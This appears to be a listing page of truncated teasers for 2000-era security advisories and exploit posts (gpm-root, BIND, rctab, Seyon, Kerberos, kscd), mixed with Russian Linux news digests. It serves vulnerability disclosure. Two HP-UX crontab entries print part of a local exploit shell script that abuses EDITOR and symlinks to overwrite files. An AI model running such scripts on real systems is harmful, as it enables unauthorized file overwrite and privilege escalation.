gpm-root fails to correctly release GID 0 membership for user defined menus

Overview gpm-root does not properly drop group privileges. Local users can gain group privileges by starting a utility from gpm-root. The gpm package is usually included in Linux distributions, and can be started from the command line or in the startup script /etc/rc.d/rc.local. Description gpm...

[SECURITY] [DSA 026-1] New version of BIND 8 released

---------------------------------------------------------------------------- Debian Security Advisory DSA-026-1 [email protected] http://www.debian.org/security/ Martin Schulze January 29, 2001 - ---------------------------------------------------------------------------- Package : bind...

SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)

source: https://www.securityfocus.com/bid/2207/info rctab is the Run Control Tab script included with the SuSE distribution of the Linux Operating System. SuSE is a freely available, Open Source Operating system maintained by SuSE Incorporated. A race condition in the rctab script could allow an...

Seyon buffer overflow exploit.

Dear, Vuln-Dev I am posting this here since I do not know if the attached buffer overflow exploit will work on any distribution where seyon comes as setgid/setuid by default. Seyon which is a telecommunications package for the X Window System, is not intended to run as setuid/setgid, however, I...

HP-UX 11.0010.20 crontab - Overwrite Files

HP-UX 11.0010.20 crontab - Overwrite Files !/bin/sh HP-UX 11.00/10.20 crontab Kyong-won,Cho [email protected] Usage : ./crontab.sh if -z "$1" then echo "Usage : $0 " exit fi cat /tmp/crontabexp !/bin/sh ln -sf $1 $1 EOF chmod 755 /tmp/crontabexp EDITOR=/tmp/crontabexp export EDITOR crontab -e ...

HP-UX 11.00/10.20 crontab - Overwrite Files

!/bin/sh HP-UX 11.00/10.20 crontab Kyong-won,Cho [email protected] Usage : ./crontab.sh if -z "$1" then echo "Usage : $0 " exit fi cat /tmp/crontabexp !/bin/sh ln -sf $1 $1 EOF chmod 755 /tmp/crontabexp EDITOR=/tmp/crontabexp export EDITOR crontab -e 2 /tmp/crontab$$ grep -v "error on previous...

Linux news 27.10.00

В продаже коробочные Linux-приложения Если большинство компаний, создающих Linux-ПО, нацелено на рынок серверных систем, то Chilliware кинулась в омут неизведанного настольного бизнеса. Подробнее: http://www.zdnet.ru/news.asp?ID=1910 Вышел Netscape Communicator 4.76 Вышла новая версия, за номером...

[SECURITY] Debian esound packages not affected by /tmp/.esd race condition

---------------------------------------------------------------------------- Debian Security Advisory [email protected] http://www.debian.org/security/ Daniel Jacobowitz October 8, 2000 - ---------------------------------------------------------------------------- Package: esound Vulnerability:...

GnoRPM local /tmp vulnerability

While fixing other problems with the gnorpm package a locally exploitable security hole was found where a normal user could trick root running GnoRPM into writing to arbitary files due to a bug in the gnorpm tmp file handling. A new release of GnoRPM 0.95.1 is now available. This fixes significan...

Linux news 25.09.00

Linux Kernel 2.2.18pre10 Вешел десятый пререлиз нового ядра Linux - Linux Kernel 2.2.18. Подробнее: http://www.cs.helsinki.fi/linux/linux-kernel/2000-38/1086.html Linux Kernel pre-patch 2.4.0 test9-pre6 Новый, шестой по счету, пререлиз девятого тестового ядра Linux Kernel 2.4.0. Подробнее:...

glibc unsetenv bug

Hello, Two distribution vendors have recently issued updated packages and advisories regarding a glibc bug. While I don't consider this bug to be a serious security issue, a more detailed description of the bug and information on affected glibc versions is needed. I am forwarding a message I post...

Kerberos 4 4.05 5.0 - KDC Spoofing

Kerberos 4 4.05 5.0 - KDC Spoofing source: https://www.securityfocus.com/bid/1616/info Kerberos is a cryptographic authentication protocol that allows users of a network to access services without transmitting cleartext passwords. A common implementation of the protocol includes a login service...

Linux news 5.07.00

Ядро 2.2.17pre10 В очередной pre версии стабильного ядра 2.2.17 Alan Cox добавил следующие патчи: обновлены драйвера, исправлена ошибка с eepro и cs46xx, обновлена документация. Подробнее: ftp://ftp.kernel.org/pub/linux/kernel/people/alan/2.2.17pre/ Progress Software создает подразделение по...

Linux news 16.06.00

SCO планирует выпускать свой собственный дистрибутив Linux. По-моему сейчас не делает свои дистрибутивы Linux только ленивый. Лучше бы был один, но отличный. Подробнее: http://slashdot.org/articles/00/06/13/127228.shtml Интервью с Аланом Коксом На LinuxJournal выложено интервью с одним из главных...

Проблемы в нескольких утилитах из дистрибутива Mandrake

Переполнения буфера в xcdroast suidroot, gatos, xkobo, xbill, Gnome iagno,...

Microsoft Windows Media Services 4.04.1 - Denial of Service (MS00-038)

Microsoft Windows Media Services 4.04.1 - Denial of Service MS00-038 // source: https://www.securityfocus.com/bid/1282/info Windows Media Encoder is part of Windows Media Services. It's purpose is to convert content into a suitable format for video or audio streaming through the Media Services. I...

KDE 1.11.1.11.22.0 kscd - SHELL Environmental Variable

KDE 1.11.1.11.22.0 kscd - SHELL Environmental Variable source: https://www.securityfocus.com/bid/1206/info Some linux distributions S.u.S.E. 6.4 reported ship with kscd a CD player for the KDE Desktop sgid disk. kscd uses the contents of the 'SHELL' environment variable to execute a browser. This...

KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable

source: https://www.securityfocus.com/bid/1206/info Some linux distributions S.u.S.E. 6.4 reported ship with kscd a CD player for the KDE Desktop sgid disk. kscd uses the contents of the 'SHELL' environment variable to execute a browser. This makes it possible to obtain a sgid 'disk' shell. Using...

Linux news 25.04.00

SCALABLE VECTOR GRAPHICS SVG IN MOZILLA Язык SVG - язык описания двумерной графики. Соответствует стандартам XML, Cascading Style Sheets CSS, Document Object Model DOM, JavaScript, PNG, и JPEG. Таким образом, через Javascript вы можете, например, "привязать" вид двумерной картинки к параметрам...

Linux news 11.04.00

Linuxconf 1.17r10 Вышла новая версия мощной утилиты конфигурирования Linux систем. Это т.н. bugfix release. Пофиксен баг в модуле pppdialin ошибка в ppplogin и в модуле inetdconf. Подробнее: http://www.appwatch.com Возрожденная Amiga строит мультимедийную Linux-платформу Gateway строила грандиозн...